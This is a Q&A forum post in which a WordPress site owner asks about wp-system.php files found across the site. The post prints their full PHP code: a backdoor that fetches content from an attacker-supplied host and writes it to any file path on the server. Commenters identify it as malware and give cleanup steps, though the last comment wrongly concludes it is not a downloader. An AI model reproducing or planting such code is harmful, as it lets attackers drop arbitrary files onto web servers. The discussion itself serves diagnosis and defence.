# I found weird wp-system.php files on my site

Tags: php

I am saw bunch of files named wp-system.php with chmod 444 on all of my directories with the following piece of code:

```
<?php 
function class_x_i($x=''){
    $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : '';
    $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : '';
    $ch = curl_init('http://'.$urlset);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    if ($filename!='') {
    file_put_contents($filename, $result);
    }
    if (isset($_GET['up2018info'])) {
        echo '01024k';
    }
}
class_x_i();

?>
```

I have never seen a file uploader like this. Can someone explain how this works?

Comment: Seems like it downloads _something_ to your server. Your site might be infected with malware, read here: [Help, I think I've been hacked - WordPress.org](https://wordpress.org/support/article/faq-my-site-was-hacked/).

Comment: What do you mean by "how this works"? Which parts of this code are unclear to you?

Comment: It's not an _uploader_, it's a _downloader_. It is capable of downloading content from the URL provided in the incoming request and then saving it in a file on your server. So basically it's a backdoor to save additional files (e.g. other malware scripts!) onto your site. It could be downloading almost anything. How it got there is a mystery, but if you haven't got file permissions tight enough on your server then this file could have got there that way, and the lax permissions will also make it easy for the script to download and save more stuff onto your server.

Comment: You need to delete all copies of this file, set more secure file permissions on your site folders and change all passwords relating to the site (e.g. logins, FTP accounts, database accounts and so on). And then check for anything else you don't recognise which this script could have been downloading.

Comment: 1. Delete everything, ideally throw the server in the bin. 2. Restore from a clean backup. 3. Update, patch, harden security, etc.

Comment: If I run it like this (http://example.com/wp-system.php?file=name.php) it creates an empty file named "name.php". So I don't think it's a downloader.